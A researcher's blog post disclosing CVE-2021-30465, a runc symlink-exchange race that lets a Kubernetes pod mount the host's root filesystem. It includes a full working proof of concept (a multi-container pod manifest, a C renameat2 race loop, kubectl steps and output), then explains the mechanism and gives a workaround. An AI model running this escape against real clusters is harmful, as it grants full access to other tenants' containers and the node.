blog.champtar.fr

runc mount destinations can be swapped via symlink-exchange to cause mounts outside the rootfs (CVE-2021-30465)

It’s November 2020 and I’m troubleshooting a container running on K8S that is doing tons of writes to the local disk. As those writes are just temporary states, I quickly add an emptyDir tmpfs volume at /var/run, open a ticket so that my devs make it permanent, and call it a day.

Some time later I notice, looking at the mount output, that this new tmpfs is mounted at /run instead of /var/run. I missed this earlier, and it surprises me a bit. /var/run is a symlink to ../run, and a quick test confirms that having mount follow symlinks is normal Linux behavior, so I start wondering how containerd/runc makes sure the mounts stay inside the container rootfs.
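
The symlink behavior can be reproduced without root. The following is a minimal sketch, assuming a throwaway directory layout that I made up to mimic /var/run -> ../run; a plain file write stands in for mount, since both let the kernel follow the symlink.

```shell
#!/bin/sh
# Sketch only: the layout under $root is hypothetical and lives in a temp dir.
set -eu
root=$(cd "$(mktemp -d)" && pwd -P)
mkdir -p "$root/run" "$root/var"
ln -s ../run "$root/var/run"        # same shape as /var/run -> ../run

# Writing "through" var/run lands in run/, the same way a mount on
# /var/run ends up attached to /run.
touch "$root/var/run/marker"
resolved=$(cd "$root/var/run" && pwd -P)
echo "var/run resolves to: ${resolved#"$root"}"
ls "$root/run"
```

The file created via var/run shows up in run/, which is exactly why the tmpfs appeared at /run.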

After following the code responsible for the mounts, I end up reading the comment of securejoin.SecureJoinVFS():

// Note that the guarantees provided by this function only apply if the path
// components in the returned string are not modified (in other words are not
// replaced with symlinks on the filesystem) after this function has returned.
// Such a symlink race is necessarily out-of-scope of SecureJoin.

If you are reading this, you already know that this race condition exists; the question is how to exploit it to escape to the K8S host.

POC

When mounting a volume, runc trusts the source and lets the kernel follow symlinks, but it doesn’t trust the target argument: it uses the ‘filepath-securejoin’ library to resolve any symlink and ensure the resolved target stays inside the container root. As explained in the SecureJoinVFS() documentation, using this function is only safe if you know that the checked path is not going to be replaced by a symlink. The problem is that we can replace it with a symlink. In K8S there is a trivial way to control the target: create a pod with multiple containers sharing some volumes, one with a valid image and the others with nonexistent images so they don’t start right away.
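
To make the check/use gap concrete, here is a deterministic walk-through, not the real runc code path. It assumes hypothetical rootfs and host directories in a temp dir, performs the swap by hand between the two steps instead of racing, and uses a file write in place of mount().

```shell
#!/bin/sh
# Sketch only: all paths are hypothetical, no mount(2) is involved.
set -eu
tmp=$(cd "$(mktemp -d)" && pwd -P)
mkdir -p "$tmp/rootfs/mnt" "$tmp/host"

# 1. Check: resolve the target and make sure it is inside rootfs.
resolved=$(cd "$tmp/rootfs/mnt" && pwd -P)
case "$resolved" in
    "$tmp/rootfs"/*) echo "check passed: $resolved" ;;
    *) echo "check failed" >&2; exit 1 ;;
esac

# 2. The attacker wins the race: the directory becomes a symlink.
rmdir "$tmp/rootfs/mnt"
ln -s "$tmp/host" "$tmp/rootfs/mnt"

# 3. Use: the path string from step 1 is resolved again by the kernel,
#    which now follows the symlink out of rootfs.
touch "$resolved/payload"
ls "$tmp/host"
```

The check in step 1 was correct when it ran; the write in step 3 still lands outside rootfs because only a string, not the directory itself, was carried over.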

Let’s start with the POC; the explanations come after.

  1. Create our attack POD

    kubectl create -f - <<EOF
    apiVersion: v1
    kind: Pod
    metadata:
      name: attack
    spec:
      terminationGracePeriodSeconds: 1
      containers:
      - name: c1
        image: ubuntu:latest
        command: [ "/bin/sleep", "inf" ]
        env:
        - name: MY_POD_UID
          valueFrom:
            fieldRef:
              fieldPath: metadata.uid
        volumeMounts:
        - name: test1
          mountPath: /test1
        - name: test2
          mountPath: /test2
    $(for c in {2..20}; do
    cat <<EOC
      - name: c$c
        image: donotexists.com/do/not:exist
        command: [ "/bin/sleep", "inf" ]
        volumeMounts:
        - name: test1
          mountPath: /test1
    $(for m in {1..4}; do
    cat <<EOM
        - name: test2
          mountPath: /test1/mnt$m
    EOM
    done
    )
        - name: test2
          mountPath: /test1/zzz
    EOC
    done
    )
      volumes:
      - name: test1
        emptyDir:
          medium: "Memory"
      - name: test2
        emptyDir:
          medium: "Memory"
    EOF
    
  2. Compile race.c (simple binary running renameat2(dir,symlink,RENAME_EXCHANGE))

    cat > race.c <<'EOF'
    #define _GNU_SOURCE
    #include <fcntl.h>
    #include <stdio.h>
    #include <stdlib.h>
    #include <sys/types.h>
    #include <sys/stat.h>
    #include <unistd.h>
    #include <sys/syscall.h>
    
    int main(int argc, char *argv[]) {
        if (argc != 4) {
            fprintf(stderr, "Usage: %s name1 name2 linkdest\n", argv[0]);
            exit(EXIT_FAILURE);
        }
        char *name1 = argv[1];
        char *name2 = argv[2];
        char *linkdest = argv[3];
    
        int dirfd = open(".", O_DIRECTORY|O_CLOEXEC);
        if (dirfd < 0) {
            perror("Error open CWD");
            exit(EXIT_FAILURE);
        }
    
        if (mkdir(name1, 0755) < 0) {
            perror("mkdir failed");
            //do not exit
        }
        if (symlink(linkdest, name2) < 0) {
            perror("symlink failed");
            //do not exit
        }
    
        // Atomically swap the directory and the symlink, forever.
        while (1)
        {
            renameat2(dirfd, name1, dirfd, name2, RENAME_EXCHANGE);
        }
    }
    EOF
    
    gcc race.c -O3 -o race
    
  3. Wait for the container c1 to start, upload the ‘race’ binary to it, and exec bash

    sleep 30 # wait for the first container to start
    kubectl cp race -c c1 attack:/test1/
    kubectl exec -ti pod/attack -c c1 -- bash
    

    You now have a shell in container c1.

  4. Create the following symlink (explanations later)

    ln -s / /test2/test2
    
  5. Launch ‘race’ multiple times to try to exploit this TOCTOU

    cd test1
    seq 1 4 | xargs -n1 -P4 -I{} ./race mnt{} mnt-tmp{} /var/lib/kubelet/pods/$MY_POD_UID/volumes/kubernetes.io~empty-dir/
    
  6. Now that everything is ready, in a second shell, update the images so that the other containers can start

    for c in {2..20}; do
      kubectl set image pod attack c$c=ubuntu:latest
    done
    
  7. Wait a bit and look at the results

    for c in {2..20}; do
      echo ~~ Container c$c ~~
      kubectl exec -ti pod/attack -c c$c -- ls /test1/zzz
    done
    
    ~~ Container c2 ~~
    test2
    ~~ Container c3 ~~
    test2
    ~~ Container c4 ~~
    test2
    ~~ Container c5 ~~
    bin   dev  home  lib64     mnt  postinst  root  sbin tmp  var
    boot  etc  lib lost+found  opt  proc    run   sys usr
    ~~ Container c6 ~~
    bin   dev  home  lib64     mnt  postinst  root  sbin tmp  var
    boot  etc  lib lost+found  opt  proc    run   sys usr
    ~~ Container c7 ~~
    error: unable to upgrade connection: container not found ("c7")
    ~~ Container c8 ~~
    test2
    ~~ Container c9 ~~
    bin  boot  dev etc  home  lib lib64  lost+found  mnt opt  postinst  proc  root  run sbin  sys  tmp usr  var
    ~~ Container c10 ~~
    test2
    ~~ Container c11 ~~
    bin   dev  home  lib64     mnt  postinst  root  sbin tmp  var
    boot  etc  lib lost+found  opt  proc    run   sys usr
    ~~ Container c12 ~~
    test2
    ~~ Container c13 ~~
    test2
    ~~ Container c14 ~~
    test2
    ~~ Container c15 ~~
    bin  boot  dev etc  home  lib lib64  lost+found  mnt opt  postinst  proc  root  run sbin  sys  tmp usr  var
    ~~ Container c16 ~~
    error: unable to upgrade connection: container not found ("c16")
    ~~ Container c17 ~~
    error: unable to upgrade connection: container not found ("c17")
    ~~ Container c18 ~~
    bin  boot  dev etc  home  lib lib64  lost+found  mnt opt  postinst  proc  root  run sbin  sys  tmp usr  var
    ~~ Container c19 ~~
    error: unable to upgrade connection: container not found ("c19")
    ~~ Container c20 ~~
    test2
    

On my first try running this POC, I had 6 containers where /test1/zzz was / on the node, some failed to start, and the remaining were not affected.

Even without the ability to update images, we could use a fast registry for c1 and a slow registry or a big image for c2+; we just need c1 to start 1 second before the others.

Tests were done on the following GKE cluster:

gcloud beta container --project "delta-array-282919" clusters create "toctou" --zone "us-central1-c" --no-enable-basic-auth --cluster-version "1.18.12-gke.1200" --release-channel "rapid" --machine-type "e2-medium" --image-type "COS_CONTAINERD" --disk-type "pd-standard" --disk-size "100" --metadata disable-legacy-endpoints=true --scopes "https://www.googleapis.com/auth/devstorage.read_only","https://www.googleapis.com/auth/logging.write","https://www.googleapis.com/auth/monitoring","https://www.googleapis.com/auth/servicecontrol","https://www.googleapis.com/auth/service.management.readonly","https://www.googleapis.com/auth/trace.append" --num-nodes "3" --enable-stackdriver-kubernetes --enable-ip-alias --network "projects/delta-array-282919/global/networks/default" --subnetwork "projects/delta-array-282919/regions/us-central1/subnetworks/default" --default-max-pods-per-node "110" --no-enable-master-authorized-networks --addons HorizontalPodAutoscaling,HttpLoadBalancing --enable-autoupgrade --enable-autorepair --max-surge-upgrade 1 --max-unavailable-upgrade 0 --enable-shielded-nodes

K8S 1.18.12, containerd 1.4.1, runc 1.0.0-rc10, 2 vCPUs

Explanations

I haven’t dug too deep in the code and relied on strace to understand what was happening, and did the investigation about a month before finally having a working POC, so details are fuzzy, but here is my understanding:

  1. K8S prepares all the volumes for the pod in /var/lib/kubelet/pods/$MY_POD_UID/volumes/VOLUME-TYPE/VOLUME-NAME (In my POC I’m using the fact that the path is known, but looking at /proc/self/mountinfo leaks all you need to find the path)

  2. containerd prepares the rootfs at /run/containerd/io.containerd.runtime.v2.task/k8s.io/SOMERANDOMID/rootfs

  3. runc calls unshare(CLONE_NEWNS) and sets the mount propagation to MS_SLAVE, thus preventing the following mount operations from affecting other containers or the node directly

  4. runc bind mounts the K8S volumes

    1. runc calls securejoin.SecureJoin() to resolve the destination/target

    2. runc calls mount()
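
Step 1 mentions that /proc/self/mountinfo leaks the volume path. Here is a minimal sketch of how that could be extracted, assuming the pod has at least one bind mount whose "root" field (4th column) contains a kubelet pods path. The sample line and its UID are made up for illustration; the real layout depends on the node.

```shell
#!/bin/sh
# Extract pod UIDs from the "root" field (4th column) of mountinfo text
# read on stdin. Sketch only: assumes the path contains /pods/<uid>/.
pod_uids() {
    awk '{ print $4 }' | sed -n 's|.*/pods/\([0-9a-f-]\{36\}\)/.*|\1|p' | sort -u
}

# Hypothetical sample line shaped like a kubelet-managed bind mount.
# Inside a real container you would run: pod_uids < /proc/self/mountinfo
sample='2339 2319 8:1 /var/lib/kubelet/pods/0b1c2d3e-4f50-6172-8394-a5b6c7d8e9f0/etc-hosts /etc/hosts rw,relatime - ext4 /dev/sda1 rw'
uid=$(printf '%s\n' "$sample" | pod_uids)
echo "/var/lib/kubelet/pods/$uid/volumes/kubernetes.io~empty-dir/"
```

In the POC the downward API (MY_POD_UID) does the same job; this only shows that removing the env variable would not hide the path.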

K8S doesn’t give us control over the mount source, but we have full control over the target of the mount. The trick is to mount a directory containing a symlink over the K8S volumes path, so that the next mount uses this new source and gives us access to the node root filesystem.

From the node, the filesystem looks like this

/var/lib/kubelet/pods/$MY_POD_UID/volumes/kubernetes.io~empty-dir/test1/mnt1
/var/lib/kubelet/pods/$MY_POD_UID/volumes/kubernetes.io~empty-dir/test1/mnt-tmp1 -> /var/lib/kubelet/pods/$MY_POD_UID/volumes/kubernetes.io~empty-dir/
/var/lib/kubelet/pods/$MY_POD_UID/volumes/kubernetes.io~empty-dir/test1/mnt2 -> /var/lib/kubelet/pods/$MY_POD_UID/volumes/kubernetes.io~empty-dir/
/var/lib/kubelet/pods/$MY_POD_UID/volumes/kubernetes.io~empty-dir/test1/mnt-tmp2
...
/var/lib/kubelet/pods/$MY_POD_UID/volumes/kubernetes.io~empty-dir/test2/test2 -> /

Our race binary is constantly swapping mntX and mnt-tmpX. When c2+ start, they do the following mounts

mount(/var/lib/kubelet/pods/$MY_POD_UID/volumes/kubernetes.io~empty-dir/test2, /run/containerd/io.containerd.runtime.v2.task/k8s.io/SOMERANDOMID/rootfs/test1/mntX)

which is equivalent to

mount(/var/lib/kubelet/pods/$MY_POD_UID/volumes/kubernetes.io~empty-dir/test2, /var/lib/kubelet/pods/$MY_POD_UID/volumes/kubernetes.io~empty-dir/test1/mntX)

because the test1 volume is bind mounted into the container rootfs.

If we are lucky, mntX is a directory when runc calls SecureJoin() and a symlink by the time it calls mount(). As mount() follows symlinks, this gives us

mount(/var/lib/kubelet/pods/$MY_POD_UID/volumes/kubernetes.io~empty-dir/test2, /var/lib/kubelet/pods/$MY_POD_UID/volumes/kubernetes.io~empty-dir/)

The filesystem now looks like

/var/lib/kubelet/pods/$MY_POD_UID/volumes/kubernetes.io~empty-dir/test2 -> /

When we do the final mount

mount(/var/lib/kubelet/pods/$MY_POD_UID/volumes/kubernetes.io~empty-dir/test2, /run/containerd/io.containerd.runtime.v2.task/k8s.io/SOMERANDOMID/rootfs/test1/zzz)

resolves to

mount(/, /run/containerd/io.containerd.runtime.v2.task/k8s.io/SOMERANDOMID/rootfs/test1/zzz)

And we now have full access to the whole node root, including /dev, /proc, all the tmpfs and overlay of other containers, everything :)

Workaround

A possible workaround is to forbid mounting volumes in volumes, but as usual upgrading is recommended.
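
As a rough illustration of the "no volumes in volumes" rule, the sketch below flags mount paths that sit underneath another mount path of the same container. The function name and the way the paths are passed in are my own assumptions; a real policy would read the mountPath values from the pod spec in an admission controller.

```shell
#!/bin/sh
# Print every mount path that is nested under another mount path.
# Arguments: the mountPath values of one container (hypothetical input).
nested_mounts() {
    for child in "$@"; do
        for parent in "$@"; do
            [ "$child" = "$parent" ] && continue
            case "$child" in
                "${parent%/}"/*) echo "$child is nested under $parent" ;;
            esac
        done
    done
}

# The mount paths of containers c2+ from the POC (shortened to two of them).
nested=$(nested_mounts /test1 /test1/mnt1 /test1/zzz /test2)
echo "$nested"
```

A pod like the attack pod would be rejected because /test1/mnt1 and /test1/zzz both live under /test1, while a pod mounting only /test1 and /test2 passes.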

Comments

This POC is far from being optimal and, as already stated, being able to update the image is not mandatory.

It took me several tries to get a working POC. At first I tried to simply mount the tmpfs volume over a host path (/root/.ssh), but this doesn’t work: the mounts happen in a new mount namespace (with the right mount propagation set), so they are not visible in the host mount namespace. I then tried a golang version of the race binary with 4 containers and 20 volumes, and this always failed. Finally I switched to a C version (not sure it makes a difference) with 19 containers and 4 mounts; this worked and gave me 6 containers out of 19 with the host mounted.

Even with newer syscalls like openat2(), you still need to mount(/proc/self/fd/X, /proc/self/fd/Y) to be race free. I’m not sure how useful a new mount flag that fails when one of the parameters is a symlink would be, but this is a huge footgun.
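
The reason /proc/self/fd paths help can be shown with a small Linux-only sketch (it needs /proc). It is not a safe mount implementation: a shell redirection cannot pass O_PATH or O_NOFOLLOW, so this only illustrates that an already opened file descriptor keeps pointing at the checked directory after the name is swapped. All paths are hypothetical temp dirs.

```shell
#!/bin/sh
# Sketch only: illustrates "pin first, then use the fd", nothing more.
set -eu
tmp=$(cd "$(mktemp -d)" && pwd -P)
mkdir -p "$tmp/rootfs/mnt" "$tmp/host"
touch "$tmp/rootfs/mnt/inside" "$tmp/host/outside"

exec 3< "$tmp/rootfs/mnt"            # pin the directory we checked

# Swap the name for a symlink after the fd was opened.
mv "$tmp/rootfs/mnt" "$tmp/rootfs/mnt-old"
ln -s "$tmp/host" "$tmp/rootfs/mnt"

by_name=$(ls "$tmp/rootfs/mnt")      # follows the new symlink
by_fd=$(ls "/proc/$$/fd/3/")         # still the directory we opened
echo "by name: $by_name, by fd: $by_fd"
exec 3<&-
```

Looking the target up by name again sees the attacker's symlink, while the fd-based path still reaches the original directory.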

This vulnerability exists because having untrusted/restricted container definitions was not part of the initial threat model of Docker/runc and was added later by K8S. You can sometimes read that K8S is multi-tenant, but you have to understand it as multiple trusted teams, not as giving API access to strangers.

On February 24th Google introduced GKE Autopilot, fully managed K8S Clusters with an emphasis on security and theoretically no access to the node, so after testing I also reported to them.

Timeline

Acknowledgments

Thanks to Aleksa Sarai (runc maintainer) for his fast responses and all his work, to Noah Meyerhans and Samuel Karp for their help fixing and testing, and to Google for the bounty.